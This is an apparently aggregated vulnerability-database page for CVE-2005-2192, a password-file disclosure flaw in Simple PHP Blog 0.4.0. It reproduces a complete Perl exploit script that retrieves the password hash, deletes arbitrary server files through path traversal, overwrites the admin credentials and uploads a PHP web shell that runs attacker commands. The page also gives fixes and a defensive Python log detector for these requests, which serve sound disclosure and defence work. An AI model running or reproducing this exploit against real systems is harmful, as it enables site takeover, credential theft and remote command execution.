CVE-2005-2192
CVSS5.0
Published: 2005-07-11 00:00:00
Revised: 2016-10-17 23:25:42

[Original] SimplePHPBlog 0.4.0 stores password hashes in config/password.txt with insufficient access control, which allows remote attackers to obtain passwords via a brute force attack.


[CNNVD] SimplePHPBlog password file information disclosure vulnerability (CNNVD-200507-085)

        Simple PHP Blog is a PHP-based blog application.
        Simple PHP Blog 0.4.0 contains an information disclosure vulnerability.
        Simple PHP Blog stores the file holding the user's password hash at config/password.txt without the necessary access control, so a remote attacker can fetch the file directly with an HTTP request and then brute-force the hash, potentially disclosing sensitive information.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2192
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2192
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-085
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=112075901100640&w=2
(UNKNOWN)  BUGTRAQ  20050707 SimplePHPBlog 0.4.0 <= Remote Password Disclosure

- Vulnerability information

SimplePHPBlog password file information disclosure vulnerability
Medium Unknown
2005-07-11 00:00:00 2006-08-24 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue; patch download link:
        http://sourceforge.net/projects/sphpblog/files/

- Vulnerability information (1191)

Simple PHP Blog <= 0.4.0 Multiple Remote Exploits (EDBID:1191)
php webapps
2005-09-01 Verified
0 Kenneth Belva
N/A
#!/usr/bin/perl -w
#===============================================================================
#	Title:		sphpblog_vulns.pl
#
#	Written by: 	Kenneth F. Belva, CISSP
#			Franklin Technologies Unlimited, Inc.
#			http://www.ftusecurity.com
#
#	Date: 		August 25, 2005
#
#	Version:	0.1
#
#	Description:	This program is for educational purposes only!
#			SimplePHPBlog has a few vulnerabilities which this
#			perl script demonstrates via an exploit.
#
#	Instructions:	Should be self-explanatory via the .pl help menu
#
#	Solutions:	
#			*** Solution 1
#			Change the line in comment_delete_cgi.php from
#			$logged_in = logged_in( false, true );    to
#			$logged_in = logged_in( true, true );
#
#			*** Solution 2
#			Place an .htaccess file with the following config in
#			the ./config directory:
#
#
#			#---------------------
#			#Snip .htaccess start
#			#---------------------			
#			IndexIgnore *
#
#			<Files .htaccess>
#			order allow,deny
#			deny from all
#			</Files>
#			
#			<Files *.txt>
#			order allow,deny
#			deny from all
#			</Files>
#			#---------------------
#			#Snip .htaccess end
#			#---------------------
#
#
#			*** Solution 3
#			See http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0885.html
#				for PHP modification to upload image script.
#===============================================================================



#-------------------------------------------------------------------------------
#	Global Parameters
#-------------------------------------------------------------------------------
use strict;
use warnings;

use vars qw/ %args /;

use Getopt::Std;
require LWP::UserAgent;
my $ua = LWP::UserAgent->new;

#-------------------------------------------------------------------------------
#	Global Routines
#-------------------------------------------------------------------------------

#Determine Operating System
my $OperatingSystem = $^O;
my $unix = "";

#Set OS Parameter
if (index(lc($OperatingSystem),"win")!=-1){
		   $unix="0"; #windows system
	    }else{
		    $unix="1"; #unix system
	    }

#-------------------------------------------------------------------------------
#	The Main Menu
#-------------------------------------------------------------------------------

sub menu()
    {
	    if ($unix){system("clear");}
	    	else{system("cls");}

	    print "
________________________________________________________________________________
		  SimplePHPBlog v0.4.0 Exploits
			     by
		     Kenneth F. Belva, CISSP
		   http://www.ftusecurity.com
________________________________________________________________________________

	Program	: $0
	Version	: v0.1
	Date	: 8/25/2005
	Descript: This perl script demonstrates a few flaws in
		  SimplePHPBlog.
	
	Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
		  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO 
		  NOT HAVE PERMISSION TO DO SO!
		  
		  Please see this script comments for solution/fixes 
		  to demonstrated vulnerabilities. 
		  http://www.simplephpblog.com

	Usage	: $0 [-h host] [-e exploit]
	
		-?      : this menu
		-h      : host
		-e	: exploit
			(1)	: Upload cmd.php in [site]/images/
			(2)	: Retrieve Password file (hash)
			(3)	: Set New User Name and Password
				[NOTE - uppercase switches for exploits]
				-U	: user name
				-P	: password
			(4)	: Delete a System File
				-F	: Path and System File 

	Examples: $0 -h 127.0.0.1 -e 2
		  $0 -h 127.0.0.1 -e 3 -U l33t -P l33t
		  $0 -h 127.0.0.1 -e 4 -F ./index.php
		  $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
		  $0 -h 127.0.0.1 -e 1
	";	
        
	exit;
    }


#-------------------------------------------------------------------------------
#	Initial Routine
#-------------------------------------------------------------------------------

    sub init()
    {

	use Switch;
	
	# colon ':' after letter says that option takes variable
        my $opt_string = 'e:U:P:h:F:?';
        getopts( "$opt_string", \%args ) or menu();
	
	#Load parameters
	my $exploit = $args{e};
	my $host = $args{h};
	my $user = $args{U};
	my $pass = $args{P};
	my $file = $args{F};
	
	# What shall we do today?
	switch (%args) {
		case "?"	{ menu();}
		case "e"	{
				switch ($exploit) {
					
					if ($unix){system("clear");}
					else{system("cls");}
					
					print "
________________________________________________________________________________
		  SimplePHPBlog v0.4.0 Exploits
			     by
		     Kenneth F. Belva, CISSP
		    http://www.ftusecurity.com
________________________________________________________________________________";


					# Upload cmd.php to /images
					case "1" {	print "\nRunning cmd.php Upload Exploit....\n\n";
							&UploadCmdPHP($host);}
					# Retrieve Username & Password hash
					case "2" {	print "\nRunning Username and Password Hash Retrieval Exploit....\n\n";
							&RetrievePwd($host."/config/password.txt");}
					# Replace Username and Password
					case "3" {	print "\nRunning Set New Username and Password Exploit....\n\n";
							&SetUserPwd($host,$user,$pass);}
					# Delete a System File
					case "4" {	print "\nRunning Delete System File Exploit....\n\n";
							&DeleteFile($host . "/comment_delete_cgi.php?y=05&m=08&comment=",$file);}

					} #end $exploit switch
					print "\n\n\n*** Exploit Completed....\nHave a nice day! :)\n";
				} #end "e" case
		else		{ menu();}
		} #end %args switch

    } #end sub init

#-------------------------------------------------------------------------------
#	Exploit #1: Upload File Via POST 
#-------------------------------------------------------------------------------

sub UploadCmdPHP {

	
	my($url) = @_;
	
	use LWP;
	use HTTP::Request::Common qw(POST);
	my $ua = LWP::UserAgent->new;
	
	$HTTP::Request::Common::DYNAMIC_FILE_UPLOAD++;

	#Step 1: Retrieve hash
	#-----------------------------------------------------------------------
	my $hash = &RetrievePwd($url."/config/password.txt");
	

	#Step 2: Delete Existing Password file (SetUserPwd)
	#Step 3: Create a temporary user id and password (SetUserPwd)
	#-----------------------------------------------------------------------
	&SetUserPwd($url,"a","a");
	

	#Step 4: Log into the app and get the PHPSession / my_id session variable
	#-----------------------------------------------------------------------
	my $SETcookie = &strip_session(&Login($url . "/login_cgi.php","a","a"));
	
	
	#Step 5: Create and upload our scripts (cmd.php & reset.php)
	#-----------------------------------------------------------------------
		&CreateTempPHPs();
	
	# Upload cmd.php
	my $path = "./cmd.php";
	my $file = "cmd.php";
	my $req = POST($url."/upload_img_cgi.php",
		Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
		Content_Type => 'form-data',
		Content => [userfile => [$path,$file],],
		);
	
	my $response = $ua->request($req);
	print "\nCreated cmd.php on target host: " . $url;
	#$response->is_success or die "Failed to POST '$url': ", $response->status_line;
	#return $response->as_string;
	
	# Upload reset.php
	$path = "./reset.php";
	$file = "reset.php";
		
	$req = POST($url."/upload_img_cgi.php",
		Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
		Content_Type => 'form-data',
		Content => [userfile => [$path,$file],],
		);
	
	$response = $ua->request($req);
	print "\nCreated reset.php on target host: " . $url;
	#$response->is_success or die "Failed to POST '$url': ", $response->status_line;
	#return $response->as_string;
	
		#Remove local PHP files
		&RemoveTempPHPs();

		
	#Step 6: Reset original Password
	#-----------------------------------------------------------------------
	&ResetHash($url."/images/reset.php",$hash);

	
	#Step 7: Pass command to delete reset.php (clean up)
	#-----------------------------------------------------------------------
	&DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=","./images/reset.php");
	print "\nRemoved reset.php from target host: " . $url;

	print "\n\nTo run command please go to following link: \n\t" . $url."/images/cmd.php?cmd=[your command]";
}

#-------------------------------------------------------------------------------
#	Exploit #2: Retrieve Password File 
#-------------------------------------------------------------------------------

sub RetrievePwd {
	
	my($url) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent->new;

	my $req = GET($url);
	
	my $response = $ua->request($req);

	$response->is_success or die "Failed to POST '$url': ", $response->status_line;
	
	my $hash = $response->content;
	print "\nRetrieved Username and Password Hash: " . $hash; 
	return $hash

}


#-------------------------------------------------------------------------------
#	Exploit #3: Set New Username and Password 
#-------------------------------------------------------------------------------

sub SetUserPwd{

	my($url,$user,$pass) = @_;

	&DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=", "./config/password.txt");
	&ResetPwd($url . "/install03_cgi.php?blog_language=english",$user,$pass);
}


#-------------------------------------------------------------------------------
#	POST to Reset Username and Password (must delete password file first)
#-------------------------------------------------------------------------------

sub ResetPwd {
	
	my($url,$user,$pass) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent->new;

	my $req = POST($url,
		      [ user  => $user,
			pass => $pass,
			submit => '%C2%A0Submit%C2%A0'
			]
		);
	
	my $response = $ua->request($req);

	$response->is_success or die "Failed to POST '$url': ", $response->status_line;

	print "\n./config/password.txt created!";
	print "\nUsername is set to: ".$user;
	print "\nPassword is set to: ".$pass;
	
}


#-------------------------------------------------------------------------------
#	Exploit #4: Delete Password File 
#-------------------------------------------------------------------------------

sub DeleteFile {
	
	my($url,$file) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent->new;

	my $req = GET($url.$file);
	
	my $response = $ua->request($req);

	$response->is_success or die "Failed to POST '$url': ", $response->status_line;
	print "\nDeleted File: ".$file; 
	
}


#-------------------------------------------------------------------------------
#	log into site
#-------------------------------------------------------------------------------

sub Login {

	my($url,$user,$pass) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent->new;

	my $req = POST($url,
		      [ user  => $user,
			pass => $pass,
			submit => '%C2%A0Submit%C2%A0'
			]
		);
	
	my $response = $ua->request($req);

	$response->is_success or die "Failed to POST '$url': ", $response->status_line;

	print "\nLogged into SimplePHPBlog at: ".$url;
	print "\nCurrent Username '".$user."' and Password '".$pass."'...";
	
	return $response->header('Set-Cookie');
	
}


#-------------------------------------------------------------------------------
#	POST the hash
#-------------------------------------------------------------------------------

sub ResetHash {

	my($url,$hash) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent->new;

	my $req = POST($url,
		      [ hash  => $hash]
		);
	
	my $response = $ua->request($req);

	$response->is_success or die "Failed to POST '$url': ", $response->status_line;

	print "\nReset Hash at: ".$url;
	print "\nReset Hash value: ".$hash;
	
	
}


#------------------------------------------------------
# Create Temp PHP files
#------------------------------------------------------

sub CreateTempPHPs{

	my($hash) = @_;

	open(PHPFILE, ">./cmd.php");
	print PHPFILE &CreateCmdPHP();
	close PHPFILE;
	print "\nCreated cmd.php on your local machine.";
	
	open(PHPFILE, ">./reset.php");
	print PHPFILE &CreateResetPHP();
	close PHPFILE;
	print "\nCreated reset.php on your local machine.";	
}

#------------------------------------------------------
# Remove Temp PHP files
#------------------------------------------------------

sub RemoveTempPHPs{

	unlink("./cmd.php");
	print "\nRemoved cmd.php from your local machine.";
	unlink("./reset.php");
	print "\nRemoved reset.php from your local machine.";
	
}


#------------------------------------------------------
# strip_session - Get PHP Session Variable
#------------------------------------------------------

sub strip_session {
	
	my($savedata) = @_;

	my $PHPstring = "PHPSESSID";
	my $semi = "\;";
	
	my $datalength = length($savedata);
	my $PHPstart= (index $savedata, $PHPstring)+10;
	my $PHPend = index $savedata,$semi,$PHPstart;
	my $PHPsession= substr $savedata, $PHPstart, ($PHPend-$PHPstart);
	return $PHPsession;
	
}


sub CreateCmdPHP(){
	
	return "

<?php

\$cmd = \$_GET[\'cmd\'];
echo \'<hr/><pre>\';
echo \'Command: \' . \$cmd;
echo '</pre><hr/><br>';

echo '<pre>';
\$last_line = system(\$cmd,\$output);
echo \'</pre><hr/>\';
?>.
"; # end 
	
}


sub CreateResetPHP(){
	
	return "

<?php

\$hash = \$_POST[\'hash\'];
\$fp = fopen(\"../config/password.txt\",\"w\");
fwrite(\$fp,\$hash);
fpclose(\$fp);

?>
"; #end return

}


#------------------------------------------------------
# 	Begin Routines
#------------------------------------------------------
	init();

# milw0rm.com [2005-09-01]
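Defender-side detection for the two request patterns the record and the listing above describe: direct reads of config/password.txt (CVE-2005-2192) and comment_delete_cgi.php calls whose comment= value is a path rather than a comment id. This is an added example, not code from the page, the advisory author or the Simple PHP Blog project; the log lines, addresses and the "well-formed" comment id are constructed, and the assumption that legitimate comment ids never contain a slash or ".." is mine, not documented by the page.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined-log format (not from any real server).
# The comment id "05.08.01.12.00.00" is an assumed well-formed value, not the app's real format.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Jul/2005:10:00:01 +0000] "GET /blog/config/password.txt HTTP/1.1" 200 45 "-" "libwww-perl/5.803"
203.0.113.5 - - [07/Jul/2005:10:00:02 +0000] "GET /blog/comment_delete_cgi.php?y=05&m=08&comment=./config/password.txt HTTP/1.1" 200 312 "-" "libwww-perl/5.803"
198.51.100.7 - - [07/Jul/2005:10:01:00 +0000] "GET /blog/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Jul/2005:10:01:05 +0000] "GET /blog/comment_delete_cgi.php?y=05&m=08&comment=05.08.01.12.00.00 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Jul/2005:10:02:00 +0000] "GET /blog/config/password.txt HTTP/1.1" 403 210 "-" "curl/7.13"
"""

# Client IP, request target and status code from a combined-log entry.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')


def classify(line):
    """Return (rule, detail) when the request matches one of the two patterns, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = unquote(url.path)
    status = int(m.group("status"))
    # Rule 1: any request for the credential file itself (CVE-2005-2192). A 200 means the hash
    # was served; any other status means the web server refused it (e.g. the .htaccess fix is in place).
    if path.endswith("/config/password.txt"):
        return ("password_file_access", "disclosed" if status == 200 else "blocked")
    # Rule 2: comment_delete_cgi.php asked to delete something that looks like a path, not a
    # comment id (assumption: real ids contain no "/", "\\" or "..").
    if path.endswith("/comment_delete_cgi.php"):
        comment = unquote(parse_qs(url.query).get("comment", [""])[0])
        if ".." in comment or "/" in comment or "\\" in comment:
            return ("comment_delete_traversal", comment)
    return None


def scan(log_text):
    """Run classify() over every line; return (client_ip, rule, detail) for each hit."""
    hits = []
    for line in log_text.splitlines():
        hit = classify(line)
        if hit is not None:
            hits.append((LOG_RE.match(line).group("ip"),) + hit)
    return hits


if __name__ == "__main__":
    for ip, rule, detail in scan(SAMPLE_LOG):
        print(f"{ip:<14} {rule:<26} {detail}")
```

A "disclosed" hit on rule 1 means the hash left the server and the credential should be rotated, not just the file protected.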
		

- Vulnerability information

17779
Simple PHP Blog (SPHPBlog) config/password.txt User Credential Disclosure
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-07-07 Unknown
2005-07-07 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete